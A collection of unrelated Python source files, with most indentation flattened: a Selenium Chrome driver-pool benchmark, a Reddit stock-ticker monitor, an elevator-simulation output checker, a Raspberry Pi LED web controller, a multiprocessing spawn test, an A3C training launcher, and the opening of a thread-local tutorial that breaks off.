def reopen_chrome_thread(sem):
driver = None
try:
driver = create_chrome_driver()
driver.get(TEST_URL)
except Exception as e:
print(e)
finally:
if driver:
driver.quit()
sem.release()
@log_time('reopen chrome')
def reopen_chrome(times, clients):
sem = Semaphore(clients)
for i in range(times):
sem.acquire()
t = Thread(target=reopen_chrome_thread, args=(sem,))
t.start()
class DriverManager:
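    """A small pool of reusable Chrome drivers backed by a deque: get_driver()
    pops an idle driver (or creates one), push_driver() returns it to the pool,
    and close() quits whatever is left in the pool."""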
def __init__(self):
self.available_drivers = deque()
def get_driver(self):
try:
driver = self.available_drivers.popleft()
except IndexError:
driver = create_chrome_driver()
return driver
def push_driver(self, driver):
self.available_drivers.append(driver)
def close(self):
try:
while True:
driver = self.available_drivers.popleft()
try:
driver.quit()
except Exception:
pass
except IndexError:
pass
def reset_driver(driver):
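    # Reset browser state without restarting Chrome: open a fresh tab, close all
    # of the old tabs, then switch to the newly opened (last) window handle.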
assert isinstance(driver, Chrome)
driver.execute_script('window.open();')
handles = driver.window_handles
for i in range(0, len(handles) - 1):
driver.switch_to.window(handles[i])
driver.close()
driver.switch_to.window(handles[-1])
def manage_chrome_tabs_thread(sem, manager):
driver = None
try:
driver = manager.get_driver()
driver.get(TEST_URL)
reset_driver(driver)
except Exception as e:
print(e)
if driver is not None:
driver.quit()
driver = None
finally:
if driver is not None:
manager.push_driver(driver)
sem.release()
@log_time('manage chrome tabs')
def manage_chrome_tabs(times, clients):
sem = Semaphore(clients)
manager = DriverManager()
for i in range(times):
sem.acquire()
t = Thread(target=manage_chrome_tabs_thread, args=(sem, manager))
t.start()
manager.close()
if __name__ == '__main__':
print('------------------------')
print('Reopen Chrome every time')
print('------------------------')
reopen_chrome(times=50, clients=5)
print('------------------')
print('Manage Chrome tabs')
print('------------------')
manage_chrome_tabs(times=50, clients=5)
|
symbols.py
|
import os
import sys
import praw
import spacy
nlp = spacy.load('en_core_web_sm',disable=['ner','textcat'])
import nltk
from nltk.tokenize import word_tokenize
import glob
import pandas as pd
import re
from datetime import datetime
import threading
dev_mode = False
def fix_path(name):
if dev_mode == True:
return name
return sys.path[0]+'/'+name
# Get the symbols
class Tickers:
def __init__(self):
df = pd.DataFrame()
for filename in glob.glob(fix_path('datasets/symbols/*')):
_df = pd.read_csv(filename, sep='\t')
_df['source'] = re.findall(r"symbols\/([a-zA-Z]+)\.txt", filename)[0]
df = df.append(_df)
self.df = df.dropna()
tickers = Tickers()
df = tickers.df
# Symbols to match & ignore
real_symbols = df['Symbol'].unique()
false_symbol = ['ON','IN','AT','FOR','BY','DD','YOLO','CORP','ONE','SUB','MOON','CEO','OUT','INTO','MAN','POST','BRO','LIFE','CALL','DUDE','IDEA']
# Get the credentials & settings for PRAW
if dev_mode != True:
from auth import reddit_client_id, reddit_client_secret, reddit_password, reddit_useragent, reddit_username
##reddit_client_id=os.environ['reddit_client_id']
#reddit_client_secret=os.environ['reddit_client_secret']
#reddit_password=os.environ['reddit_password']
#reddit_useragent=os.environ['reddit_useragent']
#reddit_username=os.environ['reddit_username']
# Monitor Reddit
class Monitor:
def __init__(self):
print("Monitoring")
self.df = False
self.df_name = False
if os.path.exists(fix_path('datasets/datasets.pkl')):
self.datasets = pd.read_pickle(fix_path('datasets/datasets.pkl'))
else:
self.datasets = pd.DataFrame()
# PRAW setup
self.praw = praw.Reddit(
client_id=reddit_client_id,
client_secret=reddit_client_secret,
password=reddit_password,
user_agent=reddit_useragent,
username=reddit_username
)
def start(self, subreddit="wallstreetbets", thread=True):
sub = self.praw.subreddit(subreddit)
if thread is True:
commentThread = threading.Thread(name='comments', target=self.monitorComments, args=(sub,subreddit))
submissionThread = threading.Thread(name='submissions', target=self.monitorSubmissions, args=(sub,subreddit))
commentThread.start()
submissionThread.start()
else:
self.monitorComments(sub,subreddit)
self.monitorSubmissions(sub,subreddit)
def monitorSubmissions(self, sub, subreddit):
for submission in sub.stream.submissions():
self.process_submission(submission, subreddit)
def monitorComments(self, sub, subreddit):
for comment in sub.stream.comments():
self.process_comment(comment, subreddit)
def process_submission(self, submission, subreddit):
NER = nlp(submission.title.lower())
NER2 = nlp(submission.selftext.lower())
found = []
has_rocket = '🚀' in submission.title.lower()
for token in NER:
if '.' in token.text:
w = token.text.upper().split('.')[0]
else:
w = token.text.upper()
if token.pos_ in ['ADP','NOUN','PROPN'] and w in real_symbols and w not in false_symbol:
found.append(w)
for token in NER2:
if '.' in token.text:
w = token.text.upper().split('.')[0]
else:
w = token.text.upper()
if token.pos_ in ['ADP','NOUN','PROPN'] and w in real_symbols and w not in false_symbol:
found.append(w)
if (len(found)>0):
#print('\n\n----------------')
#print(has_rocket, submission.title)
#print(found)
self.record(source='submission', has_rocket=has_rocket, symbols=list(set(found)), title=submission.title, subreddit=subreddit)
def process_comment(self, comment, subreddit):
NER = nlp(comment.body.lower())
found = []
has_rocket = '🚀' in comment.body.lower()
for token in NER:
if '.' in token.text:
w = token.text.upper().split('.')[0]
else:
w = token.text.upper()
if token.pos_ in ['ADP','NOUN','PROPN'] and w in real_symbols and w not in false_symbol:
found.append(w)
if (len(found)>0):
self.record(source='comment', has_rocket=has_rocket, symbols=list(set(found)), title=comment.body, subreddit=subreddit)
def get_df(self):
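        # Return the dataframe for the current minute, rotating to a new pickle
        # file (and updating the datasets.pkl index) whenever the minute changes.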
d = datetime.now()
dname = '{}-{}-{}_{}_{}'.format(d.year,d.month,d.day,d.hour,d.minute)
filename = fix_path("datasets/data/"+dname+".pkl")
if self.df_name != False:
filename_prev = fix_path("datasets/data/"+self.df_name+".pkl")
if self.df_name != dname:
# New timestep, move on to a new dataset
# Save to the index
self.datasets.at[datetime.timestamp(d), 'filename'] = filename.replace('/home/julien/mk2/main/','')
self.datasets.to_pickle(fix_path('datasets/datasets.pkl'))
print("#### New DF: ", filename)
            # Not the first run? Then there is a previous timestep buffer to save.
if self.df_name != False:
self.df.to_pickle(filename_prev)
# Create/recover a new df
if os.path.exists(filename):
# Recover existing file
self.df = False
self.df = pd.read_pickle(filename)
self.df_name = dname
else:
# Create a new DF
self.df = False
self.df = pd.DataFrame(columns=['comment', 'submission', 'rockets'])
self.df_name = dname
self.df.to_pickle(filename)
return self.df
def record(self, source, has_rocket, symbols, subreddit, title=''):
print(subreddit, source, has_rocket, symbols)
df = self.get_df()
for symbol in symbols:
if symbol in df.index:
df.at[symbol, source] = df.at[symbol, source]+1
if has_rocket:
df.at[symbol, 'rockets'] = df.at[symbol, 'rockets']+1
else:
df.at[symbol, "submission"] = 0
df.at[symbol, "comment"] = 0
df.at[symbol, source] = 1
if has_rocket:
df.at[symbol, 'rockets'] = 1
else:
df.at[symbol, 'rockets'] = 0
reddit = Monitor()
if dev_mode == True:
reddit.start(subreddit="wallstreetbets", thread=False)
else:
reddit.start(subreddit="wallstreetbets", thread=True)
reddit.start(subreddit="pennystocks", thread=True)
reddit.start(subreddit="Baystreetbets", thread=True)
|
pat.py
|
import re
import subprocess
import threading
import time
# from time import time
from config import *
from utils import *
def pat(test_data_in, class_path, jar, prt=False):
inputfile = open(test_data_in).readlines()
# print("@@@", test_data_in)
basetime, maxtime = datacheck(test_data_in)
# input = parseInput(inputfile)
# print("@@@", input)
start = time.time()
outputfile = callProgram(r"java -Xmx128m -cp {} {}".format(jar, class_path), inputfile)
end = time.time()
passed_time = end - start
# output = parseOutput(outputfile)
if prt:
for line in outputfile:
print(line)
# A, B, C = parseOutputABC(outputfile)
# print("Elevator A:")
# for line in A:
# print("\033[1;34m{}\033[0m".format(line))
# print("Elevator B:")
# for line in B:
# print("\033[1;35m{}\033[0m".format(line))
# print("Elevator C:")
# for line in C:
# print("\033[1;36m{}\033[0m".format(line))
# print(outputfile)
ac = checkAll(inputfile, outputfile)
t_ac = passed_time < maxtime
if ac is True and t_ac is True:
if passed_time > basetime + 20:
print("\033[1;33mWarning: {}, time:{}, base_time: {}\033[0m"
.format(test_data_in, passed_time, basetime, maxtime))
return True, passed_time
print("\033[1;32mPassed: {}, time:{}, base_time: {}\033[0m".format(test_data_in, passed_time, basetime))
return True, passed_time
if ac is not True:
print("\033[1;31mFailed: {}\n\tWA: {}\033[0m".format(test_data_in, ac))
return False, passed_time
if t_ac is not True:
print("\033[1;31mWarning: {}\n\tTLE: {}, max_time: {}\033[0m".format(test_data_in, passed_time, maxtime))
return True, passed_time
def parseInput(inputfile):
personRequests = []
for line in inputfile:
result = re.search(r'\[(.*)\](-?\d+)-FROM-(-?\d+)-TO-(-?\d+)', line.strip(), re.M)
personRequests.append(result.groups())
return personRequests
def run(p, output):
while True:
line = p.stdout.readline()
if not line:
break
# print(line)
output.append(line.decode().strip())
def callProgram(cmd, inputFile):
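    # Feed each input line to the child process at the time given by its leading
    # "[t]" stamp, then collect the child's stdout on a background reader thread.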
# print(cmd)
# os.chdir("temp")
# print(inputFile)
output = []
if cfg.CLOSE_STDERR:
p = subprocess.Popen(cmd,
shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
else:
p = subprocess.Popen(cmd,
shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
w = threading.Thread(target=run, args=(p, output,))
last_time = 0
for line in inputFile:
result = re.search(r'\[(.*)\](.*)', line.strip(), re.M)
sleeptime = result.group(1)
inputLine = result.group(2)
# print(sleeptime)
time.sleep(float(sleeptime) - last_time)
last_time = float(sleeptime)
write_str = inputLine + '\r\n'
# print(write_str)
p.stdin.write(write_str.encode("UTF-8"))
p.stdin.flush()
time.sleep(0.01)
w.start()
p.stdin.close()
try:
if p.wait(cfg.TIME_LIMIT) != 0:
return output
except subprocess.TimeoutExpired:
p.kill()
p.terminate()
print("\033[1;31mError: TimeoutExpired: May in the endless loop/wait. Check your 'synchronized'.")
return output
# print(p.returncode)
if p.returncode != 0:
print("\033[1;31mError: return code {} is not 0\033[0m".format(p.returncode))
return output
# os.chdir("..")
# print(output)
return output
def parseOutputABC(inputfile):
sequenceA = []
sequenceB = []
sequenceC = []
for line in inputfile:
result = re.search(r'-A', line.strip(), re.M)
if result is not None:
sequenceA.append(line)
continue
result = re.search(r'-B', line.strip(), re.M)
if result is not None:
sequenceB.append(line)
continue
result = re.search(r'-C', line.strip(), re.M)
if result is not None:
sequenceC.append(line)
continue
return sequenceA, sequenceB, sequenceC
def parseOutput(inputfile):
sequence = []
# IN = []
# OUT = []
# OPEN = []
# CLOSE = []
for line in inputfile:
result = re.search(r'\[(.*)\]IN-(-?\d+)-(-?\d+)', line.strip(), re.M)
if result is not None:
sequence.append(["IN", result.groups()])
continue
result = re.search(r'\[(.*)\]OUT-(-?\d+)-(-?\d+)', line.strip(), re.M)
if result is not None:
sequence.append(["OUT", result.groups()])
continue
result = re.search(r'\[(.*)\]OPEN-(-?\d+)', line.strip(), re.M)
if result is not None:
sequence.append(["OPEN", result.groups()])
continue
result = re.search(r'\[(.*)\]CLOSE-(-?\d+)', line.strip(), re.M)
if result is not None:
sequence.append(["CLOSE", result.groups()])
continue
result = re.search(r'\[(.*)\]ARRIVE-(-?\d+)', line.strip(), re.M)
if result is not None:
sequence.append(["ARRIVE", result.groups()])
continue
return sequence
def check_1_1(input, output, eId):
sequence = output
time = []
level = []
for mesType, mes in sequence:
time.append(float(mes[0]))
if mesType == "IN" or mesType == "OUT":
level.append(int(mes[2]))
else:
level.append(int(mes[1]))
assert len(time) == len(level)
for i in range(len(time) - 1):
estimate_time = abs(level[i + 1] - level[i]) * cfg.LEVEL_TIME[eId]
if level[i] * level[i + 1] < 0:
estimate_time -= cfg.LEVEL_TIME[eId]
if not (time[i + 1] - time[i] >= estimate_time - cfg.EPS):
return "The elevator has no enough time to move such far distance at {}: {}. {}, {}".format(i, [sequence[i-1], sequence[i], sequence[i+1]], time[i + 1] - time[i], estimate_time - cfg.EPS)
return True
def check_1_2(input, output, eId):
sequence = output
length = len(sequence)
for i, (mesType, mes) in enumerate(sequence):
if mesType == "OPEN" and i != 0:
index = i + 1
while index < len(sequence) and sequence[index][0] != "CLOSE":
index += 1
diff = cfg.DOOR_TIME
if index == len(sequence):
return "No Close with {}".format(sequence[i])
if sequence[index][0] == "CLOSE":
diff = cfg.DOOR_TIME * 2
            if not (float(sequence[index][1][0]) - float(sequence[i][1][0]) >= diff - cfg.EPS):
# print(sequence[i + 1], sequence[i])
return "The elevator has no enough time to open/close at {}: {}".format(i, [sequence[index], sequence[i], sequence[i+1]])
# if mesType == "CLOSE" and i != length - 1:
# index = i - 1
# while index > 0 and sequence[index][0] != "OPEN":
# index -= 1
# diff = 0.25
# if sequence[index][0] == "OPEN":
# diff = 0.5
# if not (float(sequence[i][1][0]) - float(sequence[index][1][0]) > diff - 0.001):
# # print(sequence[i], sequence[i - 1])
# return "The elevator has no enough time to close at {}".format(i)
return True
def getLevel(sequence):
mesType, mes = sequence
if mesType in ["OPEN", "CLOSE", "ARRIVE"]:
return int(mes[1])
else:
return int(mes[2])
def getTime(sequence):
return float(sequence[1][0])
def getId(sequence):
mesType, mes = sequence
assert mesType == "IN" or mesType == "OUT"
return int(mes[1])
def check_1_3(input, output, eId):
sequence = output
isClosed = True
for i, (mesType, mes) in enumerate(sequence):
if i != 1 and not isClosed and (getLevel(sequence[i - 1]) != getLevel(sequence[i])):
# print(sequence[i - 1], sequence[i])
return "The elevator is open at {} while you want it move: {}".format(i, [sequence[i-1], sequence[i], sequence[i+1]])
if mesType == "OPEN":
isClosed = False
if mesType == "CLOSE":
isClosed = True
return True
def check_1_4(input, output, eId):
sequence = output
isOpen = False
for i, (mesType, mes) in enumerate(sequence):
if not isOpen and (mesType == "IN" or mesType == "OUT"):
return "The elevator is closed at {} while you want someone in/out: {}".format(i, [sequence[i-1], sequence[i], sequence[i+1]])
if mesType == "OPEN":
if isOpen is True:
return "The elevator is open at {} while you want it open again: {}".format(i, [sequence[i - 1],
sequence[i],
sequence[i + 1]])
isOpen = True
if mesType == "CLOSE":
if isOpen is False:
return "The elevator is closed at {} while you want it close again: {}".format(i, [sequence[i - 1],
sequence[i],
sequence[i + 1]])
isOpen = False
if isOpen == True:
return "Elevator is not closed at the end."
return True
def check_3(input, output, eId):
sequence = output
levelNow = 1
arrivalTime = 0
for i, (mesType, mes) in enumerate(sequence):
if mesType == "ARRIVE":
level = getLevel(sequence[i])
if level in [0]:
return "Bad arrive 0 at {}: {}".format(i, [sequence[-1], sequence[i], sequence[i+1]])
time = getTime(sequence[i])
if levelNow in [-1, 1]:
if not 0 < abs(levelNow - level) <= 2:
return "Bad arrive 0 at {}: {}".format(i, [sequence[-1], sequence[i], sequence[i+1]])
else:
if not 0 < abs(levelNow - level) <= 1:
#print(levelNow, level)
return "Bad arrive at {}: {}".format(i, [sequence[-1], sequence[i], sequence[i+1]])
if not abs(arrivalTime - time) >= 0.4 - cfg.EPS:
return "Bad arrive at {}: {}".format(i, [sequence[-1], sequence[i], sequence[i+1]])
arrivalTime = time
levelNow = level
return True
def check_4(input, output, eId):
sequence = output
inside = set()
for i, (mesType, mes) in enumerate(sequence):
if mesType == "IN":
inside.add(getId(sequence[i]))
maxN = 0
if eId == "A":
maxN = 6
if eId == "B":
maxN = 8
if eId == "C":
maxN = 7
if len(inside) > maxN:
return "Elevator is full at {}: {}".format(i, [sequence[-1], sequence[i], sequence[i + 1]])
if mesType == "OUT":
if getId(sequence[i]) not in inside:
return "{} not in elevator at {}: {}".format(getId(sequence[i]), i, [sequence[-1], sequence[i], sequence[i + 1]])
inside.remove(getId(sequence[i]))
return True
def check_2(input, output):
id_now = {}
id_to = {}
id_set = []
ele = set()
for time, id_, from_, to in input:
id_now[int(id_)] = int(from_)
id_to[int(id_)] = int(to)
id_set.append(int(id_))
# print(id_now)
sequence = output
for i, (mesType, mes) in enumerate(sequence):
# print(id_now)
# print(sequence[i])
if mesType == "IN":
thisID = getId(sequence[i])
level = getLevel(sequence[i])
if (thisID not in id_now) or (level != id_now[thisID]):
return "{} is not at floor {} while you want the guy in.".format(thisID, level)
del id_now[thisID]
if thisID in ele:
return "{} has been in the elevator at {} while you want the guy in again.".format(thisID, i)
ele.add(thisID)
if mesType == "OUT":
thisID = getId(sequence[i])
if thisID not in ele:
return "{} is not in the elevator at {} while you want the guy out.".format(thisID, i)
ele.remove(thisID)
id_now[thisID] = getLevel(sequence[i])
if len(ele) > 0:
return "{} still in the elevator.".format(ele)
for id_ in id_set:
if id_now[int(id_)] != id_to[int(id_)]:
return "{} in the wrong floor at the end.".format(id_)
return True
def checkAllSequence(input, output, eId):
r_1_1 = check_1_1(input, output, eId)
r_1_2 = check_1_2(input, output, eId)
r_1_3 = check_1_3(input, output, eId)
r_1_4 = check_1_4(input, output, eId)
r_4 = check_4(input, output, eId)
# r_2 = check_2(input, output)
r_3 = check_3(input, output, eId)
if r_1_1 is not True:
return "check_1_1: \n\t" + str(r_1_1) + "\n\t" + str(output)
if r_1_2 is not True:
return "check_1_2: \n\t" + str(r_1_2) + "\n\t" + str(output)
if r_1_3 is not True:
return "check_1_3: \n\t" + str(r_1_3) + "\n\t" + str(output)
if r_1_4 is not True:
return "check_1_4: \n\t" + str(r_1_4) + "\n\t" + str(output)
if r_4 is not True:
return "check_4: \n\t" + str(r_4) + "\n\t" + str(output)
# if r_2 is not True:
# return "check_2: \n\t" + str(r_2) + "\n\t" + str(output)
if r_3 is not True:
return "check_3: \n\t" + str(r_3) + "\n\t" + str(output)
return True
def checkAll(inputfile, outputfile):
input = parseInput(inputfile)
sequenceAll = parseOutput(outputfile)
sequenceA, sequenceB, sequenceC = parseOutputABC(outputfile)
outputSequenceA = parseOutput(sequenceA)
outputSequenceB = parseOutput(sequenceB)
outputSequenceC = parseOutput(sequenceC)
r_A = checkAllSequence(input, outputSequenceA, "A")
r_B = checkAllSequence(input, outputSequenceB, "B")
r_C = checkAllSequence(input, outputSequenceC, "C")
r_All = check_2(input, sequenceAll)
if r_A is not True:
return "Error Elevator A: " + str(r_A) + "\n\t" + str(outputfile)
if r_B is not True:
return "Error Elevator B: " + str(r_B) + "\n\t" + str(outputfile)
if r_C is not True:
return "Error Elevator C: " + str(r_C) + "\n\t" + str(outputfile)
if r_All is not True:
return r_All + "\n\t" + str(outputfile)
return True
|
app.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""provide a webfrontend to set 12V LED light strips"""
################################################################################
# MIT License
#
# Copyright (c) 2017 Stefan Venz
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
################################################################################
import os
import re
import time
import threading
import socket
import cherrypy
from cherrypy.lib.static import serve_file
import pigpio
PATH = os.path.abspath(os.path.dirname(__file__))
CURDIR = os.getcwd()
cherrypy.config.update({
"tools.staticdir.dir": CURDIR,
"tools.staticdir.on": True,
"server.socket_host": socket.gethostbyname(socket.gethostname())
})
#define some values for later use
ON = 255
OFF = 0
R = 0
G = 1
B = 2
BACK_PI_LIGHTS = {
'ub' : [13, 19, 26],
'lb' : [16, 20, 21]
}
FRONT_PI_LIGHTS = {
'ur' : [18, 23, 24],
'lr' : [16, 20, 21],
'ul' : [17, 27, 22],
'll' : [13, 19, 26]
}
FRONT_PI_IP = '192.168.2.221'
BACK_PI = pigpio.pi()
FRONT_PI = pigpio.pi(FRONT_PI_IP)
FADE_TIME = 0.1
STEP_SIZE = 1
LOWER_LIMIT = 5
class LightControll(object):
"""Contains information and action about the light control"""
lights = {}
f_lights = {'ub' : 0,
'lb' : 0,
'ur' : 0,
'lr' : 0,
'ul' : 0,
'll' : 0
}
# fade functions
@classmethod
def init_fade(cls):
"""initialize all lights not to fade"""
cls.f_lights = {f_light: 0 for f_light in cls.f_lights}
@classmethod
def set_fade(cls, light):
"""set light to fade"""
cls.f_lights[light] = 1
@classmethod
def unset_fade(cls, light):
"""set light not to fade"""
cls.f_lights[light] = 0
@staticmethod
def resolve_pi(light):
"""return pi to use"""
if light in BACK_PI_LIGHTS:
return BACK_PI
return FRONT_PI
@staticmethod
def resolve_pi_lights(light):
"""return light array to use"""
if light in BACK_PI_LIGHTS:
return BACK_PI_LIGHTS
return FRONT_PI_LIGHTS
@classmethod
def resolve_pins(cls, light):
"""return the pin numbers for a given light"""
c_light = cls.resolve_pi_lights(light)
return c_light[light]
# set lights to use
def resolve_lights(self, **web_lights):
"""set LED strips to work on"""
for key in web_lights:
self.lights[re.search(r'\[(.*?)\]', key).group(1)] = web_lights[key]
print("weblights {}".format(web_lights))
print("lights: {}".format(self.lights))
# show website
@staticmethod
@cherrypy.expose
def index():
"""serve HTML file"""
return serve_file(os.path.join(PATH, 'index.html'))
# set color on color button click
@cherrypy.expose
def set_lights(self, red, green, blue, **web_lights):
"""set static color for LED Strips"""
self.resolve_lights(**web_lights)
for light in self.lights:
self.unset_fade(light)
control_pi = self.resolve_pi(light)
c_light = self.resolve_pi_lights(light)
print("light: {}: {}\n".format(light, self.lights[light]))
control_pi.set_PWM_dutycycle(int(c_light[light][R]), red)
control_pi.set_PWM_dutycycle(int(c_light[light][G]), green)
control_pi.set_PWM_dutycycle(int(c_light[light][B]), blue)
self.lights = {}
# fade light
@classmethod
def fade_light(cls, light):
"""per LED strip fade function"""
alter_green = -STEP_SIZE
alter_blue = 0
alter_red = 0
control_pi = cls.resolve_pi(light)
r_pin, g_pin, b_pin = cls.resolve_pins(light)
fade_red = control_pi.get_PWM_dutycycle(r_pin)
fade_green = control_pi.get_PWM_dutycycle(g_pin)
fade_blue = control_pi.get_PWM_dutycycle(b_pin)
while cls.f_lights[light]:
if alter_green:
fade_green += alter_green
if fade_green < LOWER_LIMIT:
# dim green to 0
control_pi.set_PWM_dutycycle(g_pin, LOWER_LIMIT)
fade_green = LOWER_LIMIT
alter_green = OFF
alter_blue = -STEP_SIZE
time.sleep(FADE_TIME)
continue
if fade_green > (ON - STEP_SIZE):
# set green to 255
control_pi.set_PWM_dutycycle(g_pin, ON)
fade_green = ON
alter_green = OFF
alter_blue = STEP_SIZE
time.sleep(FADE_TIME)
continue
# change green by STEP_SIZE
control_pi.set_PWM_dutycycle(g_pin, fade_green)
time.sleep(FADE_TIME)
if alter_blue:
fade_blue += alter_blue
if fade_blue < LOWER_LIMIT:
# dim blue to 0
control_pi.set_PWM_dutycycle(b_pin, LOWER_LIMIT)
fade_blue = LOWER_LIMIT
alter_blue = OFF
alter_red = STEP_SIZE
time.sleep(FADE_TIME)
continue
if fade_blue > (ON - STEP_SIZE):
# set blue to 255
control_pi.set_PWM_dutycycle(b_pin, ON)
fade_blue = ON
alter_blue = OFF
alter_red = -STEP_SIZE
time.sleep(FADE_TIME)
continue
                # change blue by STEP_SIZE
control_pi.set_PWM_dutycycle(b_pin, fade_blue)
time.sleep(FADE_TIME)
if alter_red:
fade_red += alter_red
if fade_red < LOWER_LIMIT:
# dim red to 0
                    control_pi.set_PWM_dutycycle(r_pin, LOWER_LIMIT)
fade_red = LOWER_LIMIT
alter_red = OFF
alter_green = -STEP_SIZE
time.sleep(FADE_TIME)
continue
if fade_red > (ON - STEP_SIZE):
# set red to 255
control_pi.set_PWM_dutycycle(r_pin, ON)
fade_red = ON
alter_red = OFF
alter_green = STEP_SIZE
time.sleep(FADE_TIME)
continue
# change red by STEP_SIZE
control_pi.set_PWM_dutycycle(r_pin, fade_red)
time.sleep(FADE_TIME)
def fade_lights(self, **web_lights):
"""start fade for selected LED strips"""
self.resolve_lights(**web_lights)
print("in fadeLights")
for light in self.lights:
self.set_fade(light)
threading.Thread(target=self.fade_light, args=(light,)).start()
self.lights = {}
@staticmethod
def turn_pi_lights(state):
"""switch all lights on/off"""
for light in BACK_PI_LIGHTS:
LightControll.unset_fade(light)
print(light)
if BACK_PI.connected:
for pin in BACK_PI_LIGHTS[light]:
print(pin)
BACK_PI.set_PWM_dutycycle(int(pin), state)
for light in FRONT_PI_LIGHTS:
print(light)
if FRONT_PI.connected:
for pin in FRONT_PI_LIGHTS[light]:
print(pin)
FRONT_PI.set_PWM_dutycycle(int(pin), state)
@cherrypy.expose
def control_button_click(self, button_id, **web_lights):
"""backend for buttons on webinterface - react on button click"""
print("button_id: {}\n".format(button_id))
        if button_id == 'off':
print("in off")
self.turn_pi_lights(OFF)
        if button_id == 'on':
self.init_fade()
print("in on")
self.turn_pi_lights(ON)
        if button_id == 'fade':
print("in fade")
if web_lights:
self.fade_lights(**web_lights)
def __init__(self):
self.init_fade()
self.turn_pi_lights(OFF)
if __name__ == '__main__':
cherrypy.quickstart(LightControll(), '/')
|
test_spawn.py
|
from __future__ import absolute_import
from billiard import get_context
class test_spawn:
def test_start(self):
ctx = get_context('spawn')
p = ctx.Process(target=task_from_process, args=('opa',))
p.start()
p.join()
return p.exitcode
def task_from_process(name):
print('proc:', name)
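# Illustrative only: with the 'spawn' start method the child process re-imports
# this module, so any direct run should keep process creation under a __main__
# guard like the one below.
if __name__ == '__main__':
    print(test_spawn().test_start())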
|
run_rl.py
|
from __future__ import print_function, division
import os
os.environ["OMP_NUM_THREADS"] = "1"
import argparse
import torch
import torch.multiprocessing as mp
from rl.environment import atari_env
from baselines.sam.utils import read_config
from baselines.sam.a3c import A3CSAM
from rl.train_sam import train
from rl.test_sam import test
from rl.shared_optim import SharedRMSprop, SharedAdam
#from gym.configuration import undo_logger_setup
import time
#undo_logger_setup()
parser = argparse.ArgumentParser(description='A3C')
parser.add_argument(
'--lr',
type=float,
default=0.0001,
metavar='LR',
help='learning rate (default: 0.0001)')
parser.add_argument(
'--gamma',
type=float,
default=0.99,
metavar='G',
help='discount factor for rewards (default: 0.99)')
parser.add_argument(
'--tau',
type=float,
default=0.92,
metavar='T',
    help='parameter for GAE (default: 0.92)')
parser.add_argument(
'--seed',
type=int,
default=1,
metavar='S',
help='random seed (default: 1)')
parser.add_argument(
'--workers',
type=int,
default=32,
metavar='W',
help='how many training processes to use (default: 32)')
parser.add_argument(
'--num-steps',
type=int,
default=20,
metavar='NS',
help='number of forward steps in A3C (default: 20)')
parser.add_argument(
'--max-episode-length',
type=int,
default=10000,
metavar='M',
help='maximum length of an episode (default: 10000)')
parser.add_argument(
'--env',
default='PongNoFrameskip-v4',
metavar='ENV',
    help='environment to train on (default: PongNoFrameskip-v4)')
parser.add_argument(
'--env-config',
default='./rl/config.json',
metavar='EC',
help='environment to crop and resize info (default: config.json)')
parser.add_argument(
'--shared-optimizer',
default=True,
metavar='SO',
    help='use an optimizer with shared statistics.')
parser.add_argument(
'--load', default=False, metavar='L', help='load a trained model')
parser.add_argument(
'--save-max',
default=True,
metavar='SM',
help='Save model on every test run high score matched or bested')
parser.add_argument(
'--optimizer',
default='Adam',
metavar='OPT',
help='shares optimizer choice of Adam or RMSprop')
parser.add_argument(
'--load-model-dir',
default='saved_models/',
metavar='LMD',
help='folder to load trained models from')
parser.add_argument(
'--save-model-dir',
default='saved_models/',
metavar='SMD',
help='folder to save trained models')
parser.add_argument(
'--log-dir', default='logs/', metavar='LG', help='folder to save logs')
parser.add_argument(
'--gpu-ids',
type=int,
default=-1,
nargs='+',
help='GPUs to use [-1 CPU only] (default: -1)')
parser.add_argument(
'--amsgrad',
default=True,
metavar='AM',
help='Adam optimizer amsgrad parameter')
parser.add_argument(
'--skip-rate',
type=int,
default=4,
metavar='SR',
help='frame skip rate (default: 4)')
# Based on
# https://github.com/pytorch/examples/tree/master/mnist_hogwild
# Training settings
# Implemented multiprocessing using locks but was not beneficial. Hogwild
# training was far superior
if __name__ == '__main__':
args = parser.parse_args()
torch.manual_seed(args.seed)
if args.gpu_ids == -1:
args.gpu_ids = [-1]
else:
torch.cuda.manual_seed(args.seed)
mp.set_start_method('spawn')
setup_json = read_config(args.env_config)
env_conf = setup_json["Default"]
for i in setup_json.keys():
if i in args.env:
env_conf = setup_json[i]
env = atari_env(args.env, env_conf, args)
shared_model = A3CSAM(env.observation_space.shape, env.action_space)
num_params = 0
for p in shared_model.parameters():
num_params += p.data.view(-1).size(0)
print(f"num param {num_params}")
if args.load:
saved_state = torch.load(
'{0}{1}.dat'.format(args.load_model_dir, args.env),
map_location=lambda storage, loc: storage)
shared_model.load_state_dict(saved_state)
shared_model.share_memory()
if args.shared_optimizer:
if args.optimizer == 'RMSprop':
optimizer = SharedRMSprop(shared_model.parameters(), lr=args.lr)
if args.optimizer == 'Adam':
optimizer = SharedAdam(
shared_model.parameters(), lr=args.lr, amsgrad=args.amsgrad)
optimizer.share_memory()
else:
optimizer = None
processes = []
p = mp.Process(target=test, args=(args, shared_model, env_conf))
p.start()
processes.append(p)
time.sleep(0.1)
for rank in range(0, args.workers):
p = mp.Process(
target=train, args=(rank, args, shared_model, optimizer, env_conf))
p.start()
processes.append(p)
time.sleep(0.1)
for p in processes:
time.sleep(0.1)
p.join()
|
python0811_threadLocal.py
|
# -*- coding: utf-8 -*-
import threading
global_dict = {}
class Student(object):
    # minimal Student stand-in so this tutorial snippet runs on its own
    def __init__(self, name):
        self.name = name
def std_thread(name):
